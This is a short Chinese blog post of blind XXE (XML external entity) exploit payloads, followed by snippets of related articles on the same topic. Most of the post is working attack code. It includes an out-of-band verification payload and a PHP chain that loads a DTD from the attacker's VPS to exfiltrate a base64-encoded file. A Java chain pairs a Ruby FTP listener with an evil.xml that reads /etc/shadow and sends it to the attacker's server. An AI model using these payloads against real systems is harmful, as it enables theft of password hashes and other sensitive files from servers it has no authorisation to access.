XXE blind 简单poc & 读文件

已于 2023-11-21 20:39:25 修改
阅读量3.3k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞列表 渗透 文章标签: python
于 2018-03-27 19:46:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33020901/article/details/79718048
本文介绍了XML外部实体(XXE)注入攻击的基本原理及利用方法,包括如何构造简单的验证POC,通过不同语言环境(如PHP和Java)进行XXE攻击以获取敏感文件内容的具体实践案例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原理简介:

https://blog.youkuaiyun.com/u011721501/article/details/43775691

首先你要确定是xml格式的数据,content-type是xml,PHP和JAVA利用有点不一样

简单验证POC:

<!DOCTYPE b [<!ENTITY xxe SYSTEM  "http://xxxxx.ceye.io/sworderNB22222-----">]>
<name>&xxe;</name>

PHP 利用方式. // python3 http.server 9099 开个服务 就行,读到的文件 直接就显示 出来了(访问日志)

读取文件POC 利用:

自己vps放置

test.dtd

<!ENTITY % all "<!ENTITY send SYSTEM 'http://your_vps/get.php?file=%file;'>">

访问post处贴

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % remote SYSTEM "http://your_vps/test.dtd">
%remote;
%all;
]>
<root>&send;</root>

JAVA利用方式

参考 http://www.voidcn.com/article/p-njawsjxm-ko.html

参考 从 blind XXE 到读取根目录文件 - 先知社区

自己VPS运行:  

ruby ftp.rb(centos安装ruby挺方便,别嫌麻烦,就一行命令
// name ftp.rb
require 'socket'
server = TCPServer.new 8080
loop do
  Thread.start(server.accept) do |client|
    puts "New client connected"
    data = ""
    client.puts("220 xxe-ftp-server")
    loop {
        req = client.gets()
        puts "< "+req
        if req.include? "USER"
            client.puts("331 password please - version check")
        else
           #puts "> 230 more data please!"
            client.puts("230 more data please!")
        end
    }
  end
end

自己VPS放置:

// evil.xml
<!ENTITY % file SYSTEM "file:///etc/shadow">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://ip:8080/%file;'>">
%int;
%send;

访问post处贴

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip/evil.xml">
%remote;]>
<root/>


 

33-3 XXE漏洞 - XXE外部实体注入(文件取)
weixin_43263566的博客
04-02 563
这个XML文档看起来很简单,但实际上它包含了一种XML外部实体注入(XXE)攻击。通过在DTD中定义恶意实体并在XML文档中引用它们,攻击者可以利用XXE漏洞来取敏感文件、执行命令或进行其他恶意操作。实体可以在XML文档中被引用,类似于变量,在文档解析过程中会被替换为其定义的值。:这是DOCTYPE声明,用于指定XML文档的文档类型定义(DTD)。,但实际上它可以被定义为任何攻击者想要的内容,包括文件路径、命令等。:这是XML文档的声明部分,指定了XML版本和字符编码。:在DTD中定义了一个实体。
windows文件xxe_XXE漏洞利用方式详解
weixin_35029653的博客
12-11 803
XXE漏洞的详细原理解释和利用中,XXE的基本原理还有简单文件取利用方式我们已经有了基本的了解,那么接下来就带来我们的XXE漏洞详解——进阶篇!xxe漏洞利用在实战中往往会遇到很多的问题,也需要更多种多样的利用方式和技巧,本片就给大家一一介绍~文件时有特殊符号在文件时,文件中包含"&lt;,&gt;,&amp;"等这些特殊符号时,会被xml解析器解析,报错从而导致取失败,例如尝试...
XXE漏洞3-通过 XXE 漏洞实现文件取及端口探测
最新发布
2401_89464052的博客
07-16 797
本文介绍了利用XXE漏洞的两种方式:1)通过php://filter协议以base64编码格式取PHP文件内容,解码后可获取源代码;2)结合SSRF技术进行端口探测,通过响应信息判断目标端口开放状态,并可结合BurpSuite批量探测。这两种方法分别实现了敏感文件取和网络探测功能,其中端口探测会返回banner信息并可能暴露文件路径,通过响应长度差异可判断端口存活情况。
XXE文件 Geek10th
weixin_44377940的博客
11-14 1045
点开网站: 抓包,修改属性: 返回了这么一串: 由于是$name==md5(),由弱类型比较和md5想到md5碰撞,
Web安全 XXE漏洞的 测试和利用.(取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6870
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
XXE文件随意
weixin_48421613的博客
09-03 2028
XXE的利用 声明: 我们本次实验所使用的php版本为5.4版本,有些版本是实验不成功的 XXE注入可分为有回显的与没有回显的 有回显的:制造一个具有xxe漏洞的代码(xxe.php) &lt;?php $xml=simplexml_load_string($_GET['xml']); echo $xml; //这是有回显的xxe注入 ?&gt; 首先我们使用我们本地的服务器进行探测,使用burpsuite进行抓板进行分析 我们可以看到我们提交的参数已经出
XXE取任意文件 BUUCTF [PHP]XXE
weixin_73049307的博客
09-16 729
ENTITY xxe SYSTEM "file:///etc/passwd" >]>改成"file:///phpinfo.php"也没显示出phpinfo.php文件内容,不知道怎么解决了。(注意:这里的POST的php文件名字必须是simplexml_load_string.php)直接Ctfl F搜索flag,发现还真有,尝试输入flag看看什么情况?发现是一段例子和介绍,将其复制到《XML基础知识之外部实体》一文中了。看到上面有个github的链接,点进去看看。很明显是个phpinfo.php文件
java审计之XXE
Hq_Dream的博客
01-20 2235
java审计之XXE 有很久很久没更新这个csdn博客了,忽然想下载个资料发现没积分了,嗯额,分享个最新更新的文章。文章首发是个人的另一个博客 最近审计公司的xxx项目(java方面),对于我也是刚接触java方面的审计,边学习边审计,其中发现了几个有意思的blind xxe于是单独挑出XXE深入研究下,我觉得有必要page记录一下审计与学习的内容,对于xxe方面内容可能还不是太完整后续再添加吧,...
XXE(XML External Entity attack)XML外部实体注入攻击
xiaoi123的博客
08-15 2304
导语   XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。   尽管XXE漏洞已经...
【网络安全】JAVA代码审计—— XXE外部实体注入
HBohan的博客
01-14 1266
想要了解XXE,在那之前需要了解XML的相关基础
WebLogic CVE-2019-2647、CVE-2019-2648、CVE-2019-2649、CVE-2019-2650 XXE漏洞分析
晓得哥的博客
05-02 1101
@xxlegend在《Weblogic CVE-2019-2647等相关XXE漏洞分析》分析了其中的一个XXE漏洞点,并给出了PoC。刚入手java不久,本着学习的目的,自己尝试分析了其他几个点的XXE并构造了PoC。下面的分析我尽量描述自己思考以及PoC构造过程,新手真的会踩很多莫名其妙的坑。感谢在复现与分析过程中为我提供帮助的小伙伴@Badcode,没有他的帮助我可能环境搭起来都会花费一大半时...
pikachu靶场通关
2301_80185313的博客
09-19 1653
pikachu靶场通关详解
文件xxe_XXE
weixin_36165398的博客
01-14 836
一、 XXE是什么?有哪些危害?XML外部实体,允许XML引用外部数据作为变量。形式如下。]&gt;&lt;user&gt;&lt;username&gt;&amp;xxe;username&gt;&lt;password&gt;adminpassword&gt;user&gt;由于外部实体允许多种协议,所以XXE等同于任意文件取+SSRFXXE靶场https://github....
Poc初探之XXE
04-18 571
用bwapp的例子简单回顾下xxe漏洞:通过在xml外部实体附带非法参数,实现非法操作。如下图: POC编写思路:针对漏洞页面,发送带相应非法参数的包。人生苦短,下面用Python 的urllib2模块演示。 1 #! /usr/bin/python 2 # coding=utf-8 3 # __author__='Dou—wei' ...
干货分享 | XXE 漏洞任意文件取利用方式汇总,从零基础到精通,收藏这篇就够了!
leah126的博客
02-22 1235
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
[ctf web]XXE通过DTD文件+XML和DTD基础语法(以[ctfshow]web_ak4观心和[NCTF2019]Fake XML cookbook为例)
ShenZ的博客
08-23 822
XML基础 XML文件可以分为三部分: XML声明 &lt;?xml version ="1.0" encoding="UTF-8"?&gt; DTD文档定义类型。 文档元素 &lt;foo&gt;&lt;note category="COOKING"&gt;&lt;/note&gt;&lt;/foo&gt; 根元素foo,子元素note,属性category XML语法 XML被设计为传输和存储数据 基本语法: - 所有 XML 元素都须有关闭标签。 - XML 标签对大小写敏感。 - X
xxe盲注
qq_62046696的博客
03-18 1020
当然除了这些,还有一种方式代替一些符号比如百分号%,参数实体的百分号%也不能出现在实体值中,这个时候我们可以用Unicode编码,%=% 也可以写做16进制 ,%=%=%外部实体+参数实体的二重调用%errorr1;%errorr;
XEE漏洞任意文件
m0_58001548的博客
04-30 2399
XXE全称是——XML External Entity,也就是XML外部实体注入攻击。通过 XML实体,"SYSTEM”关键词导致XML解析器可以从本地文件或者远程URI中取数据。所以攻击者可以通过XML实体传递自己构造的恶意值,使处理程序解析它。当引用外部实体时,通过构造恶意内容,可导致取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。XML指可扩展标记语言(Extensible Markup Language)XML是一种标记语言,很类似HTML。
windows文件xxe_XXE原理及利用
weixin_35387118的博客
12-21 1496
“一个人的伟大之处乃在于他是一座桥梁,而不是目的。By尼采”一XXE原理01XML 简介XML 指可扩展标记语言(EXtensible Markup Language),和HTML很类似,但XML的设计目的是传输数据而非显示数据,且XML没有预定义的标签,因此需要自行定义标签。下面是一个XML文档的实例。GeorgeJohnReminderDon't forget the meeting...
XXE漏洞利用详解:任意文件取技巧
&quot;本资源主要讲解了XXE(XML External Entity)漏洞的利用,特别是如何进行任意文件取的攻击手法。&quot; 在Web安全领域,XXE(XML External Entity)漏洞是一种常见且危险的安全问题,它发生在应用程序解析XML输入时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值